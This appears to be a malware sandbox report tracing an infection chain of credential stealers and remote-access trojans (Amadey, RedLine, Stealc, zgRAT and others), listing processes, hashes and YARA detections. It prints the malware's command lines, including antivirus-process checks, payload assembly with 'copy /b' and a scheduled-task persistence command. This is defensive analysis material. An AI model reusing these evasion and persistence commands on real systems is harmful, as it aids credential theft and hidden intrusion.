Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1448950419.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1408682891.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:03:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x210000
File size:	1'925'120 bytes
MD5 hash:	CB1A17EFDA5BE9D8D7CE9FE5903812DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1976285464.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	00:03:04
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Imagebase:	0xe90000
File size:	320'000 bytes
MD5 hash:	389881B424CF4D7EC66DE13F01C7232A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2010973024.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:03:04
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:03:04
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x890000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.2186619176.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:03:07
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Imagebase:	0x400000
File size:	903'168 bytes
MD5 hash:	84263AB03B0A0F2B51CC11B93EC49C9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:03:07
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:03:08
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x6e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:03:09
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe"
Imagebase:	0x180000
File size:	364'544 bytes
MD5 hash:	A3EF9920A91B891837705E46BB26DE17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:03:09
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\u3uP67496d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\u3uP67496d.exe"
Imagebase:	0x9b0000
File size:	311'296 bytes
MD5 hash:	4E60F3FD76D9EAB244F9DC00F7765B0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000000.2055908255.00000000009B2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:03:10
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Imagebase:	0x610000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2078736142.0000000000611000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.2069470188.0000000000611000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:03:11
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Imagebase:	0x220000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2079003288.0000000000221000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000000.2076774547.0000000000221000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:03:12
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0xed0000
File size:	192'000 bytes
MD5 hash:	7A02AA17200AEAC25A375F290A4B4C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000002.2318326891.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000002.2323134391.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000000.2088515827.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:03:13
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Imagebase:	0x220000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.3813401574.0000000000221000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.2097350358.0000000000221000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	00:03:19
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Imagebase:	0x400000
File size:	4'278'784 bytes
MD5 hash:	7FA5C660D124162C405984D14042506F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000017.00000002.2248416427.0000000003159000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000002.2261123132.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	00:03:22
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Imagebase:	0xf40000
File size:	506'368 bytes
MD5 hash:	6760374F17416485FA941B354D3DD800
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000000.2188308850.0000000000F42000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:03:23
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:03:25
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe"
Imagebase:	0x410000
File size:	464'896 bytes
MD5 hash:	37D198AD751D31A71ACC9CB28ED0C64E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	00:03:26
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe"
Imagebase:	0x400000
File size:	6'608'463 bytes
MD5 hash:	E17DD8E8ED9803018341037275960E16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 0000001C.00000003.3201366776.0000000003E85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:03:27
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:03:28
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000285001\2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000285001\2.exe"
Imagebase:	0x80000
File size:	689'664 bytes
MD5 hash:	B859D1252109669C1A82B235AAF40932
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	00:03:28
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	00:03:28
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x540000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ZharkRAT, Description: Yara detected Zhark RAT, Source: 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ZharkRAT, Description: Yara detected Zhark RAT, Source: 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ZharkRAT, Description: Yara detected Zhark RAT, Source: 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	00:03:31
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe"
Imagebase:	0x400000
File size:	1'381'143 bytes
MD5 hash:	2B01C9B0C69F13DA5EE7889A4B17C45E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	00:03:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	00:03:33
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	00:03:35
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Imagebase:	0x660000
File size:	321'536 bytes
MD5 hash:	FF5AFED0A8B802D74AF1C1422C720446
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	00:03:35
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	00:03:36
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x5b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000026.00000002.2581111095.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000002.2587789310.000000000291A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	00:03:36
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xaa0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	00:03:36
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	00:03:38
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Imagebase:	0xcb0000
File size:	360'448 bytes
MD5 hash:	2F1D09F64218FFFE7243A8B44345B27E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	00:03:42
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xaa0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	00:03:42
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	00:03:44
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 607698
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	00:03:44
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "MaskBathroomCompositionInjection" Participants
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	00:03:44
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	00:03:45
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\607698\Waters.pif
Wow64 process (32bit):	true
Commandline:	Waters.pif Q
Imagebase:	0x5f0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	00:03:45
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xa0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	00:03:47
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	00:03:47
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 052A03DF Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e5d0d601875e05efbfeaf09a630dd68afa101621307c282767b0c468b94a00
Instruction ID: 926cda512210041aa5c2c970e05df5472a852329cc92afcf4ad39af175e4e2cc
Opcode Fuzzy Hash: 85e5d0d601875e05efbfeaf09a630dd68afa101621307c282767b0c468b94a00
Instruction Fuzzy Hash: AD1160DB17C210FF6041D1666B6CAF66B9FFAD73307708526B447D1A42E2C80A991132

Function 052A03FB Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40305cc4433635e35fc05076870252cca43c2f52bfbef39a623e19ca312a3479
Instruction ID: b705048d00fb7a808b8fee8e592341dc743d3038c03d7009c0511af12b3ec11a
Opcode Fuzzy Hash: 40305cc4433635e35fc05076870252cca43c2f52bfbef39a623e19ca312a3479
Instruction Fuzzy Hash: 8121D5DB17C111FFA041D0666B6CAF66B9FFEDB7317304517B007D5A42E2C81A9A1032

Function 052A040B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715b519a6b0e75a26fd31336129d16f6e0f4a24f0590c0bda6cf0e875df5487e
